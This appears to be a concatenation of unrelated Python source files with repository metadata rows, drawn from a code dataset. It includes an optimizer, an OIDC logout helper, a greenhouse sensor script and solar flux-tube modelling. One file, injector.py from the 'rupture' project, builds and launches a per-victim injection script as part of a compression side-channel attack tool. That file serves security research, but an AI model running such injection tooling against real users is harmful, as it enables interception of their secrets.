beta1_power = math_ops.cast(beta1_power, var.dtype.base_dtype)
beta2_power = math_ops.cast(beta2_power, var.dtype.base_dtype)
lr = (lr_t * math_ops.sqrt(1 - beta2_power) / (1 - beta1_power))
m = self.get_slot(var, "adam_m")
v = self.get_slot(var, "adam_v")
m_t = (tf.multiply(beta1_t, m) + tf.multiply(1.0 - beta1_t, grad))
m_t = m.assign(m_t, use_locking=self._use_locking)
v_t = (tf.multiply(beta2_t, v) + tf.multiply(1.0 - beta2_t, tf.square(grad)))
v_t = v.assign(v_t, use_locking=self._use_locking)
m_t_hat = m_t / (1. - beta1_power)
v_t_hat = v_t / (1. - beta2_power)
update = m_t_hat / (tf.sqrt(v_t_hat) + epsilon_t)
if self._do_use_weight_decay(var.name):
update += weight_decay_rate * var
var_update = var - lr * update
var_update = var.assign(var_update, use_locking=self._use_locking)
return tf.group(*[var_update, m_t, v_t])
def _apply_sparse_shared(self, grad, var, indices, scatter_add):
beta1_power, beta2_power = self._get_beta_accumulators()
beta1_power = math_ops.cast(beta1_power, var.dtype.base_dtype)
beta2_power = math_ops.cast(beta2_power, var.dtype.base_dtype)
lr_t = math_ops.cast(self._lr_t, var.dtype.base_dtype)
beta1_t = math_ops.cast(self._beta1_t, var.dtype.base_dtype)
beta2_t = math_ops.cast(self._beta2_t, var.dtype.base_dtype)
epsilon_t = math_ops.cast(self._epsilon_t, var.dtype.base_dtype)
lr = (lr_t * math_ops.sqrt(1 - beta2_power) / (1 - beta1_power))
# m_t = beta1 * m + (1 - beta1) * g_t
m = self.get_slot(var, "adam_m")
m_scaled_g_values = grad * (1 - beta1_t)
m_t = state_ops.assign(m, m * beta1_t, use_locking=self._use_locking)
with ops.control_dependencies([m_t]):
m_t = scatter_add(m, indices, m_scaled_g_values)
# v_t = beta2 * v + (1 - beta2) * (g_t * g_t)
v = self.get_slot(var, "adam_v")
v_scaled_g_values = (grad * grad) * (1 - beta2_t)
v_t = state_ops.assign(v, v * beta2_t, use_locking=self._use_locking)
with ops.control_dependencies([v_t]):
v_t = scatter_add(v, indices, v_scaled_g_values)
v_sqrt = math_ops.sqrt(v_t)
var_update = state_ops.assign_sub(
var, lr * m_t / (v_sqrt + epsilon_t), use_locking=self._use_locking)
return control_flow_ops.group(*[var_update, m_t, v_t])
def _apply_sparse(self, grad, var):
return self._apply_sparse_shared(
grad.values,
var,
grad.indices,
lambda x, i, v: state_ops.scatter_add( # pylint: disable=g-long-lambda
x,
i,
v,
use_locking=self._use_locking))
def _resource_scatter_add(self, x, i, v):
with ops.control_dependencies(
[resource_variable_ops.resource_scatter_add(x.handle, i, v)]):
return x.value()
def _resource_apply_sparse(self, grad, var, indices):
return self._apply_sparse_shared(grad, var, indices,
self._resource_scatter_add)
def _finish(self, update_ops, name_scope):
# Update the power accumulators.
with ops.control_dependencies(update_ops):
beta1_power, beta2_power = self._get_beta_accumulators()
with ops.colocate_with(beta1_power):
update_beta1 = beta1_power.assign(
beta1_power * self._beta1_t, use_locking=self._use_locking)
update_beta2 = beta2_power.assign(
beta2_power * self._beta2_t, use_locking=self._use_locking)
return control_flow_ops.group(
*update_ops + [update_beta1, update_beta2], name=name_scope)
def _do_use_weight_decay(self, param_name):
"""Whether to use L2 weight decay for `param_name`."""
if not self._weight_decay_rate:
return False
# for r in self._include_in_weight_decay:
# if re.search(r, param_name) is not None:
# return True
if self._exclude_from_weight_decay:
for r in self._exclude_from_weight_decay:
if re.search(r, param_name) is not None:
tf.logging.info('Adam WD excludes {}'.format(param_name))
return False
return True
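# A minimal usage sketch (an assumption, not part of the original file): in TF1
# graph mode this optimizer is driven like any tf.train optimizer; `loss` and
# the exclusion patterns below are illustrative only.
#
#   optimizer = AdamOptimizer(learning_rate=2e-5,
#                             weight_decay_rate=0.01,
#                             exclude_from_weight_decay=['LayerNorm', 'layer_norm', 'bias'])
#   train_op = optimizer.minimize(loss, global_step=tf.train.get_or_create_global_step())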
| 44.444444
| 85
| 0.64463
| 9,604
| 0.889259
| 0
| 0
| 0
| 0
| 0
| 0
| 1,890
| 0.175
|
552db8b8886012305a174d08f78e6a22fd0ea206
| 38
|
py
|
Python
|
tests/test_e2e.py
|
sasakalaba/drone-strike
|
92e1aa9a79347f2fdc336529b584206aa20e72d3
|
[
"Unlicense"
] | null | null | null |
tests/test_e2e.py
|
sasakalaba/drone-strike
|
92e1aa9a79347f2fdc336529b584206aa20e72d3
|
[
"Unlicense"
] | null | null | null |
tests/test_e2e.py
|
sasakalaba/drone-strike
|
92e1aa9a79347f2fdc336529b584206aa20e72d3
|
[
"Unlicense"
] | null | null | null |
from .base import BaseTestCase
pass
| 7.6
| 30
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
552fdd4ea7856ad8f238ffba4056d7b666e1d19e
| 1,559
|
py
|
Python
|
backend/breach/helpers/injector.py
|
Cancelll/rupture
|
cd87481717b39de2654659b7ff436500e28a0600
|
[
"MIT"
] | 184
|
2016-03-31T04:19:42.000Z
|
2021-11-26T21:37:12.000Z
|
backend/breach/helpers/injector.py
|
Cancelll/rupture
|
cd87481717b39de2654659b7ff436500e28a0600
|
[
"MIT"
] | 212
|
2016-03-31T04:32:06.000Z
|
2017-02-26T09:34:47.000Z
|
backend/breach/helpers/injector.py
|
Cancelll/rupture
|
cd87481717b39de2654659b7ff436500e28a0600
|
[
"MIT"
] | 38
|
2016-03-31T09:09:44.000Z
|
2021-11-26T21:37:13.000Z
|
from backend.settings import BASE_DIR
import os
import subprocess
import stat
rupture_dir = os.path.abspath(os.path.join(BASE_DIR, os.pardir))
client_dir = os.path.join(rupture_dir, 'client')
def inject(victim):
_create_client(victim)
_create_injection(victim)
_run_injection(victim)
def _create_client(victim):
realtimeurl = victim.realtimeurl
victimid = victim.id
with open(os.devnull, 'w') as FNULL:
p = subprocess.Popen(
[os.path.join(client_dir, 'build.sh'), str(realtimeurl), str(victimid)],
cwd=client_dir,
stdout=FNULL,
stderr=subprocess.PIPE
)
return p.wait()
def _create_injection(victim):
sourceip = victim.sourceip
victimid = victim.id
with open(os.path.join(client_dir, 'inject.sh'), 'r') as f:
injection = f.read()
injection = injection.replace('$1', str(sourceip))
inject_file = os.path.join(client_dir, 'client_{}/inject.sh'.format(victimid))
with open(inject_file, 'w') as f:
f.write(injection)
clientid_inject = inject_file
st = os.stat(clientid_inject)
os.chmod(clientid_inject, st.st_mode | stat.S_IEXEC)
def _run_injection(victim):
victimid = victim.id
clientid_dir = os.path.join(client_dir, 'client_{}'.format(victimid))
with open(os.devnull, 'w') as FNULL:
subprocess.Popen(
os.path.join(clientid_dir, 'inject.sh'),
shell=True,
cwd=client_dir,
stdout=FNULL,
stderr=subprocess.PIPE
)
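# Usage sketch (hedged): inject(victim) expects an object exposing
# `realtimeurl`, `sourceip` and `id` (a Victim model instance in this project);
# it builds the per-victim client, writes client_<id>/inject.sh and launches it.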
| 25.557377
| 84
| 0.645285
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 88
| 0.056446
|
5530fb74fc5655f0d169fed9774ccb03f4699d79
| 952
|
py
|
Python
|
wagtail_client/utils.py
|
girleffect/core-integration-demo
|
c37a0d5183d16bec6245a41e12dd90691ffa7138
|
[
"BSD-3-Clause"
] | null | null | null |
wagtail_client/utils.py
|
girleffect/core-integration-demo
|
c37a0d5183d16bec6245a41e12dd90691ffa7138
|
[
"BSD-3-Clause"
] | 19
|
2018-02-06T08:56:24.000Z
|
2018-09-11T08:05:24.000Z
|
wagtail_client/utils.py
|
girleffect/core-integration-demo
|
c37a0d5183d16bec6245a41e12dd90691ffa7138
|
[
"BSD-3-Clause"
] | 2
|
2018-05-25T09:44:03.000Z
|
2021-08-18T12:07:47.000Z
|
from urllib.parse import urlencode
from django.conf import settings
from django.contrib.sites.shortcuts import get_current_site
def provider_logout_url(request):
"""
    Construct a logout URL that logs the user out of the Identity Provider
    (Authentication Service).
    :param request: the current HttpRequest, used to resolve the site settings
    :return: the provider logout URL including the redirect parameters
"""
site = get_current_site(request)
if not hasattr(site, "oidcsettings"):
raise RuntimeError(f"Site {site} has no settings configured.")
parameters = {
"post_logout_redirect_uri": site.oidcsettings.wagtail_redirect_url
}
# The OIDC_STORE_ID_TOKEN setting must be set to true if we want to be able to read
# it from the session.
if "oidc_id_token" in request.session:
parameters["id_token_hint"] = request.session["oidc_id_token"]
redirect_url = settings.OIDC_OP_LOGOUT_URL + "?" + urlencode(parameters, doseq=True)
return redirect_url
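# Illustrative example (hedged; the hostnames and settings values below are
# assumptions, not taken from this project's configuration): with
# OIDC_OP_LOGOUT_URL = "https://auth.example.com/openid/logout" and a
# wagtail_redirect_url of "https://site.example.com/", the returned URL looks like:
#   https://auth.example.com/openid/logout?post_logout_redirect_uri=https%3A%2F%2Fsite.example.com%2F&id_token_hint=<id token>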
| 34
| 91
| 0.722689
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 423
| 0.444328
|
553261313f73826b4fd76c66eae4be0cde9803af
| 978
|
py
|
Python
|
connectToProteusFromMongo.py
|
erentts/Ignite-Greenhouse
|
328730399328936332b5c6f3f8dcd18bf56369b9
|
[
"MIT"
] | 4
|
2021-02-22T21:19:28.000Z
|
2021-05-03T14:19:18.000Z
|
connectToProteusFromMongo.py
|
erentts/Ignite-Greenhouse
|
328730399328936332b5c6f3f8dcd18bf56369b9
|
[
"MIT"
] | null | null | null |
connectToProteusFromMongo.py
|
erentts/Ignite-Greenhouse
|
328730399328936332b5c6f3f8dcd18bf56369b9
|
[
"MIT"
] | null | null | null |
import pymongo
import dns
import serial
from pymongo import MongoClient
import struct
cluster = MongoClient("")
serialPort = serial.Serial(port= "COM1", baudrate=9600 ,bytesize =8 , timeout =None, parity='N',stopbits=1)
db=cluster["<greenHouse>"]
collection = db["greenhouses"]
while serialPort.readline():
results = collection.find({"greenHouseName" : "SERA 1" })
for result in results:
targetTemperature = abs(int(result.get("targetTemperature")))
# declaring an integer value
int_val = targetTemperature
# converting to string
str_val = str(targetTemperature)
# converting string to bytes
byte_val = str_val.encode()
serialPort.write(byte_val)
getterThree = collection.update_one({"greenHouseName" : "SERA 1"},{"$set":{"targetTemperature" : targetTemperature }})
getter = collection.update_one({"greenHouseName" : "SERA 1"},{"$set":{"currentTemperature" : float(serialPort.read() + serialPort.read()) }})
| 31.548387
| 145
| 0.702454
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 261
| 0.266871
|
55333cbb250a399b054018a193b9449274e24d7c
| 837
|
py
|
Python
|
website_sale_cache/__manifest__.py
|
factorlibre/website-addons
|
9a0c7a238e2b6030d57f7a08d48816b4f2431524
|
[
"MIT"
] | 1
|
2020-03-01T03:04:21.000Z
|
2020-03-01T03:04:21.000Z
|
website_sale_cache/__manifest__.py
|
factorlibre/website-addons
|
9a0c7a238e2b6030d57f7a08d48816b4f2431524
|
[
"MIT"
] | null | null | null |
website_sale_cache/__manifest__.py
|
factorlibre/website-addons
|
9a0c7a238e2b6030d57f7a08d48816b4f2431524
|
[
"MIT"
] | 3
|
2019-07-29T20:23:16.000Z
|
2021-01-07T20:51:24.000Z
|
# Copyright 2017 Artyom Losev
# Copyright 2018 Kolushov Alexandr <https://it-projects.info/team/KolushovAlexandr>
# License MIT (https://opensource.org/licenses/MIT).
{
"name": """E-commerce Category Cache""",
"summary": """Use this module to greatly accelerate the loading of a page with a large number of product categories""",
"category": "Website",
"images": ["images/websale_cache.png"],
"version": "13.0.1.0.1",
"author": "IT-Projects LLC, Artyom Losev",
"support": "apps@itpp.dev",
"website": "https://www.it-projects.info",
"license": "Other OSI approved licence", # MIT
"price": 25.00,
"currency": "EUR",
"depends": ["website_sale", "website", "base_action_rule"],
"data": ["views.xml", "data/ir_action_server.xml", "data/base_action_rules.xml"],
"installable": False,
}
| 41.85
| 123
| 0.658303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 692
| 0.826762
|
5537fd0769af5384988d439a528247d706c25d2b
| 848
|
py
|
Python
|
lumin/utils/mod_ver.py
|
choisant/lumin
|
c039136eb096e8f3800f13925f9325b99cf7e76b
|
[
"Apache-2.0"
] | 43
|
2019-02-11T16:16:42.000Z
|
2021-12-13T15:35:20.000Z
|
lumin/utils/mod_ver.py
|
choisant/lumin
|
c039136eb096e8f3800f13925f9325b99cf7e76b
|
[
"Apache-2.0"
] | 48
|
2020-05-21T02:40:50.000Z
|
2021-08-10T11:07:08.000Z
|
lumin/utils/mod_ver.py
|
choisant/lumin
|
c039136eb096e8f3800f13925f9325b99cf7e76b
|
[
"Apache-2.0"
] | 14
|
2019-05-02T15:09:41.000Z
|
2022-01-12T21:13:34.000Z
|
import pkg_resources
__all__ = []
def check_pdpbox():
try:
ver = pkg_resources.get_distribution("pdpbox").version
assert ver >= '0.2.0+13.g73c6966', f'''You have version {ver} of pdpbox. Use of this function requires pdpbox>=0.2.0+13.g73c6966, which is not currently
available from pypi. Please install from source via:\n
`git clone https://github.com/SauceCat/PDPbox.git && cd PDPbox && pip install -e .`'''
except pkg_resources.DistributionNotFound:
print('''Use of this function requires pdpbox>=0.2.0+13.g73c6966, which is not currently available from pypi. Please install from source via:\n
`git clone https://github.com/SauceCat/PDPbox.git && cd PDPbox && pip install -e .`''')
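# A minimal usage sketch (the import path is assumed from this file's location):
# call the check before importing any pdpbox-dependent plotting helpers.
#
#   from lumin.utils.mod_ver import check_pdpbox
#   check_pdpbox()  # asserts/prints install instructions if pdpbox is missing or too old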
| 56.533333
| 160
| 0.602594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 623
| 0.73467
|
553885dd25affc404a552785fdb6d4e6392000ff
| 18,526
|
py
|
Python
|
pysac/mhs_atmosphere/mhs_model/flux_tubes.py
|
SolarDrew/pysac
|
9fd86dd03966b7e7f90653a47a2ccca7964c83bc
|
[
"BSD-2-Clause"
] | null | null | null |
pysac/mhs_atmosphere/mhs_model/flux_tubes.py
|
SolarDrew/pysac
|
9fd86dd03966b7e7f90653a47a2ccca7964c83bc
|
[
"BSD-2-Clause"
] | null | null | null |
pysac/mhs_atmosphere/mhs_model/flux_tubes.py
|
SolarDrew/pysac
|
9fd86dd03966b7e7f90653a47a2ccca7964c83bc
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 11 11:37:39 2014
@author: sm1fg
Construct the magnetic network and generate the adjustments to the
non-magnetic atmosphere for mhs equilibrium.
"""
import os
import warnings
import numpy as np
import astropy.units as u
from scipy.interpolate import RectBivariateSpline
#============================================================================
# locate flux tubes and footpoint strength
#============================================================================
def get_flux_tubes(
model_pars,
coords,
option_pars
):
""" Obtain an array of x,y coordinates and corresponding vertical
component value for the photospheric magnetic field """
if model_pars['nftubes'] == 0:
xi, yi, Si = [[0.]]*u.Mm, [[0.]]*u.Mm, [[0.0]]*u.T # x,y,Bz(r=0,z=0)
else:
xi, yi, Si = (
u.Quantity([
[0.]] * model_pars['nftubes'], unit=u.Mm),
u.Quantity([
[0.]] * model_pars['nftubes'], unit=u.Mm),
u.Quantity([
[0.1/model_pars['nftubes']]] * model_pars['nftubes'],
unit=u.T),
)
# parameters for matching Mumford,Fedun,Erdelyi 2014
if option_pars['l_sunspot']:
Si = [[0.5]]*u.T # 128.5mT SI units
# parameters for matching Mumford,Fedun,Erdelyi 2014
if option_pars['l_mfe']:
Si = [[0.1436]]*u.T # 128.5mT SI units
elif option_pars['l_drewmod']:
Si = [[0.012]] * u.T
#Si = [[0.005]] * u.T
#Si = [[0.05]] * u.T
elif model_pars['model'] == 'drewtube':
Si = [[2.7]] * u.kG
#Si = [[0.001]] * u.T
# parameters for matching Gent,Fedun,Mumford,Erdelyi 2014
elif option_pars['l_single']:
Si = [[0.1]]*u.T # 100mT SI units
# parameters for matching Gent,Fedun,Erdelyi 2014 flux tube pair
elif option_pars['l_tube_pair']:
xi, yi, Si = (
u.Quantity([
[ 1.0],
[ 1.0],
[-0.95],
[-1.05]
], unit=u.Mm),
u.Quantity([
[ 0.00],
[ 0.00],
[ .15],
[-0.15]
], unit=u.Mm),
u.Quantity([
[ 50e-3],
[ 50e-3],
[ 50e-3],
[ 50e-3]
], unit=u.T)
)# 50mT SI
# parameters for matching Gent,Fedun,Erdelyi 2014 twisted flux tubes
elif option_pars['l_multi_twist']:
"""xi, yi, Si = (
u.Quantity([
[ 0.34],
[ 0.07],
[ .14],
[-0.31]
], unit=u.Mm),
u.Quantity([
[ 0.20],
[ 0.33],
[ 0.04],
[-0.34]
], unit=u.Mm),
u.Quantity([
[ 50e-3],
[ 50e-3],
[ 50e-3],
[ 50e-3]
], unit=u.T)
)# 50mT SI"""
xi, yi, Si = (u.Quantity([[0.34], [0.07], [0.14], [-0.31]], unit=u.Mm),
u.Quantity([[0.2], [0.33], [0.04], [-0.34]], unit=u.Mm),
u.Quantity([[50e-3], [50e-3], [50e-3], [50e-3]], unit=u.T))
elif option_pars['l_multi_netwk']:
xi, yi, Si = (
u.Quantity([
[0.]] * model_pars['nftubes'], unit=u.Mm),
u.Quantity([
[0.]] * model_pars['nftubes'], unit=u.Mm),
u.Quantity([
[0.5/model_pars['nftubes']]] * model_pars['nftubes'],
unit=u.T),
)
x1 = [-1.75, -0.75, 1.25, 1.00, -0.75]
y1 = [-1.00, 0.50, 0.50, -1.50, 1.70]
xi[ : 3] += x1[0] * u.Mm
xi[3 : 6] += x1[1] * u.Mm
xi[6 : 9] += x1[2] * u.Mm
xi[9 :12] += x1[3] * u.Mm
xi[12:15] += x1[4] * u.Mm
yi[ : 3] += y1[0] * u.Mm
yi[3 : 6] += y1[1] * u.Mm
yi[6 : 9] += y1[2] * u.Mm
yi[9 :12] += y1[3] * u.Mm
yi[12:15] += y1[4] * u.Mm
for xj in xi:
xj += np.random.uniform(-0.5,0.5) * u.Mm
for xj in yi:
xj += np.random.uniform(-0.5,0.5) * u.Mm
elif option_pars['l_multi_lanes']:
xi, yi, Si = (
u.Quantity([
[0.]] * model_pars['nftubes'], unit=u.Mm),
u.Quantity([
[0.]] * model_pars['nftubes'], unit=u.Mm),
u.Quantity([
[0.475/model_pars['nftubes']]] * model_pars['nftubes'],
unit=u.T),
)
x1 = [-2., -1.2, -0.4, 0.4, 1.2, 2.]
xi[ : 3] += x1[0] * u.Mm
xi[3 : 6] += x1[1] * u.Mm
xi[6 : 9] += x1[2] * u.Mm
xi[9 :12] += x1[3] * u.Mm
xi[12:15] += x1[4] * u.Mm
xi[16:18] += x1[5] * u.Mm
for xj in xi:
xj += np.random.uniform(-0.5,0.5) * u.Mm
for xj in yi:
xj += np.random.uniform(-0.25,0.25) * u.Mm
else:
raise ValueError("in get_flux_tubes axial parameters need to be defined")
return xi, yi, Si
#-----------------------------------------------------------------------------
#
def get_hmi_flux_tubes(
model_pars, option_pars,
indx,
dataset = 'hmi_m_45s_2014_07_06_00_00_45_tai_magnetogram_fits',
sunpydir = os.path.expanduser('~/sunpy/data/'),
savedir = os.path.expanduser('~/figs/hmi/'),
l_newdata = False
):
""" indx is 4 integers: lower and upper indices each of x,y coordinates
# dataset of the form 'hmi_m_45s_2014_07_06_00_00_45_tai_magnetogram_fits'
# """
from sunpy.net import vso
import sunpy.map
client = vso.VSOClient()
results = client.query(vso.attrs.Time("2014/07/05 23:59:50",
"2014/07/05 23:59:55"),
vso.attrs.Instrument('HMI'),
vso.attrs.Physobs('LOS_magnetic_field'))
if l_newdata:
        if not os.path.exists(sunpydir):
raise ValueError("in get_hmi_map set 'sunpy' dir for vso data\n"+
"for large files you may want link to local drive rather than network")
client.get(results).wait(progress=True)
    if not os.path.exists(savedir):
os.makedirs(savedir)
hmi_map = sunpy.map.Map(sunpydir+dataset)
#hmi_map = hmi_map.rotate()
#hmi_map.peek()
s = hmi_map.data[indx[0]:indx[1],indx[2]:indx[3]] #units of Gauss Bz
s *= u.G
nx = s.shape[0]
ny = s.shape[1]
nx2, ny2 = 2*nx, 2*ny # size of interpolant
#pixel size in arc seconds
dx, dy = hmi_map.scale.items()[0][1],hmi_map.scale.items()[1][1]
x, y = np.mgrid[
hmi_map.xrange[0]+indx[0]*dx:hmi_map.xrange[0]+indx[1]*dx:1j*nx2,
hmi_map.xrange[0]+indx[2]*dy:hmi_map.xrange[0]+indx[3]*dy:1j*ny2
]
#arrays to interpolate s from/to
fx = u.Quantity(np.linspace(x.min().value,x.max().value,nx), unit=x.unit)
fy = u.Quantity(np.linspace(y.min().value,y.max().value,ny), unit=y.unit)
xnew = u.Quantity(np.linspace(x.min().value,x.max().value,nx2), unit=x.unit)
ynew = u.Quantity(np.linspace(y.min().value,y.max().value,ny2), unit=y.unit)
f = RectBivariateSpline(fx,fy,s.to(u.T))
#The initial model assumes a relatively small region, so a linear
#Cartesian map is applied here. Consideration may be required if larger
#regions are of interest, where curvature or orientation near the lim
#of the surface is significant.
s_int = f(xnew,ynew) #interpolate s and convert units to Tesla
s_int /= 4. # rescale s as extra pixels will sum over FWHM
x_int = x * 7.25e5 * u.m #convert units to metres
y_int = y * 7.25e5 * u.m
dx_int = dx * 7.25e5 * u.m
dy_int = dy * 7.25e5 * u.m
    FWHM = 0.5*(dx_int+dy_int)  # dx/dy were renamed *_int above
smax = max(abs(s.min()),abs(s.max())) # set symmetric plot scale
cmin = -smax*1e-4
cmax = smax*1e-4
#
# filename = 'hmi_map'
# import loop_plots as mhs
# mhs.plot_hmi(
# s*1e-4,x_SI.min(),x_SI.max(),y_SI.min(),y_SI.max(),
# cmin,cmax,filename,savedir,annotate = '(a)'
# )
# filename = 'hmi_2x2_map'
# mhs.plot_hmi(
# s_SI*4,x_SI.min(),x_SI.max(),y_SI.min(),y_SI.max(),
# cmin,cmax,filename,savedir,annotate = '(a)'
# )
#
# return s_SI, x_SI, y_SI, nx2, ny2, dx_SI, dy_SI, cmin, cmax, FWHM
#============================================================================
# Magnetic Field Construction (See. Fedun et.al 2011)
#============================================================================
def construct_magnetic_field(
x, y, z,
x0, y0, S,
model_pars,
option_pars,
physical_constants,
scales):
""" Construct self similar magnetic field configuration
Note if model_pars['B_corona'] = 0 then paper3 results otherwise paper 2
"""
#Extract commonly used scales:
z1 = model_pars['photo_scale']
z2 = model_pars['chrom_scale']
z3 = model_pars['corona_scale']
f0 = model_pars['radial_scale']
mu0 = physical_constants['mu0']
g0 = physical_constants['gravity']
#scale Bf1, Bf2 to sum to 1
Bf1 = model_pars['phratio']
Bf2 = model_pars['chratio']
Bf3 = model_pars['coratio']
Bbz = model_pars['B_corona']
#define exponentials and derivatives, basis functions
if option_pars['l_B0_expz']:
B1z = Bf1 * np.exp(-z**2/z1**2)
B2z = Bf2 * np.exp(-z/z2)
B3z = Bf3 * np.exp(-z/z3)
B0z = B1z + B2z + B3z
B10dz= -2*z*B1z/z1**2 - B2z/z2 - B3z/z3
B20dz= -2* B1z/z1**2 + 4*z**2*B1z/z1**4 + B2z/z2**2 + B3z/z3**2
B30dz= 12*z*B1z/z1**4 - 8*z**3*B1z/z1**6 - B2z/z2**3 - B3z/z3**3
elif option_pars['l_B0_rootz']:
B0z = Bf2 * z2**(0.125) / (z + z2)**(0.125)
B10dz = -0.125 * B0z / (z + z2)
B20dz = 9./64. * B0z / (z + z2)**2
B30dz = -153./512 * B0z / (z + z2)**3
elif option_pars['l_B0_quadz']:
B1z = Bf1 * z1**2 / (z**2 + z1**2)
B2z = Bf2 * z2 /(z + z2)
B3z = Bf3 * np.exp(-z/z3)# B3z = Bf3 * z3 /(z + z3)
B0z = B1z + B2z + B3z
B10dz=- 2 * z *B1z**2/z1**2 - B2z**2/z2 - B3z/z3
B20dz= 8*z**2*B1z**3/z1**4 - 2* B1z**2/z1**2 +2*B2z**3/z2**2 +2*B3z/z3**2
B30dz=-48*z**3*B1z**4/z1**6 +24*z*B1z**3/z1**4 -6*B2z**4/z2**3 -6*B3z/z3**3
else:
raise ValueError("in mhs_model.flux_tubes.construct_magnetic_field \
option_pars all False for axial strength Z dependence")
rr= np.sqrt((x-x0)**2 + (y-y0)**2)
#self similarity functions
fxyz= -0.5*rr**2 * B0z**2
G0 = np.exp(fxyz/f0**2)
#Define Field
B0z2 = B0z*B0z
Bx = -S * (x-x0) * (B10dz * B0z * G0)
By = -S * (y-y0) * (B10dz * B0z * G0)
Bz = S * B0z2 * G0 + Bbz
f02 = f0*f0
G02 = G0*G0
B0z3 = B0z2*B0z
# B0z4 = B0z3*B0z
B10dz2 = B10dz**2
#Define derivatives of Bx
dxBx = - S * (B10dz * B0z * G0) + 2 * S * (x-x0)**2 * B10dz * B0z3 * G0/f02
dyBx = 2 * S * (x-x0) * (y-y0) * B10dz * B0z3 * G0/f02
dzBx = - 2 * S * (x-x0) * (B0z*B20dz + (1. + 2.*fxyz/f02)*B10dz2)*G0
#Define derivatives By
dyBy = - S * (B10dz * B0z * G0) \
+ 2 * S * (y-y0)**2 * B10dz * B0z3 * G0/f02
dxBy = 2 * S * (x-x0) * (y-y0) * B10dz * B0z3 * G0/f02
dzBy = - 2 * S * (y-y0) * (B0z*B20dz + (1. + 2.*fxyz/f02)*B10dz2)*G0
#Magnetic Pressure and horizontal thermal pressure balance term
pbbal= -0.5*Bz**2/mu0 + 0.5/mu0 * S**2 * G02 * (
f02 * B0z * B20dz + 2 * fxyz * B10dz2) + S*Bbz*G0/mu0 * (
f02 * B20dz / B0z + (2 * fxyz - f02) * B10dz2 / B0z2)
#density balancing B
# import pdb; pdb.set_trace()
del rr, x, y, z
rho_1 = S**2*G02/(mu0*g0) * (
(0.5*f02 + 2*fxyz) * B10dz*B20dz + 0.5*f02 * B0z*B30dz
- 2. * B0z3*B10dz
) + S*Bbz*G0/(mu0*g0) * (f02*B30dz/B0z + (2*f02 - 2*fxyz +
4*fxyz**2/f02) * B10dz2*B10dz/B0z3 +
3 * (2*fxyz - f02) * B20dz*B10dz/B0z2
- 2 * (fxyz/f02 + 1) * B10dz*B0z )
B2x = (Bx * dxBx + By * dyBx + Bz * dzBx)/mu0
B2y = (Bx * dxBy + By * dyBy + Bz * dzBy)/mu0
return pbbal, rho_1, Bx, By, Bz, B2x, B2y
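# Compact restatement of the field above (added for clarity; it follows
# directly from the code): with r^2 = (x-x0)^2 + (y-y0)^2 and
#   G0 = exp(-r^2 B0z(z)^2 / (2 f0^2)),
# the components are
#   Bx = -S (x-x0) B0z B0z' G0,   By = -S (y-y0) B0z B0z' G0,
#   Bz =  S B0z^2 G0 + B_corona,
# where B0z' = dB0z/dz (B10dz in the code).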
#============================================================================
# Magnetic Field Construction (See. Fedun et.al 2011)
#============================================================================
def construct_pairwise_field(x, y, z,
xi, yi,
xj, yj,
Si, Sj,
model_pars,
option_pars,
physical_constants,
scales
):
""" Construct self similar magnetic field configuration """
#Extract commonly used scales:
z1 = model_pars['photo_scale']
z2 = model_pars['chrom_scale']
z3 = model_pars['corona_scale']
f0 = model_pars['radial_scale']
mu0 = physical_constants['mu0']
g0 = physical_constants['gravity']
#scale Bf1, Bf2 to sum to 1
Bf1 = model_pars['phratio']
Bf2 = model_pars['chratio']
Bf3 = model_pars['coratio']
Bbz = model_pars['B_corona']
#define exponentials and derivatives, basis functions
if option_pars['l_B0_expz']:
B1z = Bf1 * np.exp(-z**2/z1**2)
B2z = Bf2 * np.exp(-z/z2)
B3z = Bf3 * np.exp(-z/z3)
B0z = B1z + B2z + B3z
B10dz= -2*z*B1z/z1**2 - B2z/z2 - B3z/z3
B20dz= -2* B1z/z1**2 + 4*z**2*B1z/z1**4 + B2z/z2**2 + B3z/z3**2
B30dz= 12*z*B1z/z1**4 - 8*z**3*B1z/z1**6 - B2z/z2**3 - B3z/z3**3
else:
#if option_pars['l_BO_quadz']:
B1z = Bf1 * z1**2 / (z**2 + z1**2)
B2z = Bf2 * z2 /(z + z2)
B3z = Bf3 * np.exp(-z/z3)
# B3z = Bf3 * z3 /(z + z3)
B0z = B1z + B2z + B3z
B10dz=- 2 * z *B1z**2/z1**2 - B2z**2/z2 - B3z/z3
B20dz= 8*z**2*B1z**3/z1**4 - 2* B1z**2/z1**2 +2*B2z**3/z2**2 +2*B3z/z3**2
B30dz=-48*z**3*B1z**4/z1**6 +24*z*B1z**3/z1**4 -6*B2z**4/z2**3 -6*B3z/z3**3
B10dz2 = B10dz**2
BB10dz = B10dz*B0z
BB10dz2 = BB10dz**2
BB20dz = B20dz*B0z
B0z2 = B0z*B0z
# B30dz= -B1z/z1**3 - B2z/z2**3
ri= np.sqrt((x-xi)**2 + (y-yi)**2)
rj= np.sqrt((x-xj)**2 + (y-yj)**2)
ri2 = ri**2
rj2 = rj**2
#self similarity functions
fxyzi= -ri2 * B0z2/2.
fxyzj= -rj2 * B0z2/2.
f02 = f0*f0
G0i = np.exp(fxyzi/f02)
G0j = np.exp(fxyzj/f02)
G0ij = G0i*G0j
#Define Field
Bxi = -Si * (x-xi) * (B10dz * B0z * G0i)
Byi = -Si * (y-yi) * (B10dz * B0z * G0i)
Bzi = Si * B0z**2 * G0i + Bbz
Bxj = -Sj * (x-xj) * (B10dz * B0z * G0j)
Byj = -Sj * (y-yj) * (B10dz * B0z * G0j)
Bzj = Sj * B0z**2 * G0j + Bbz
B0z3 = B0z2*B0z
B0z4 = B0z3*B0z
BdB2 = B10dz2/B0z2
B2dB = B20dz/B0z
#Magnetic Pressure and horizontal thermal pressure balance term
pbbal= - Bzi*Bzj/mu0 - Si*Sj*G0ij*f02*(B10dz2 + BB20dz)/mu0 \
+ Bbz*Si*G0i * ((2*fxyzi - f02) * BdB2 + f02 * B2dB) /mu0 \
+ Bbz*Sj*G0j * ((2*fxyzj - f02) * BdB2 + f02 * B2dB) /mu0
#density balancing B
rho_1 = \
2.*Si*Sj*G0ij*BB10dz/(mu0*g0)*(
+ (fxyzi + fxyzj) * (BdB2 + B2dB)
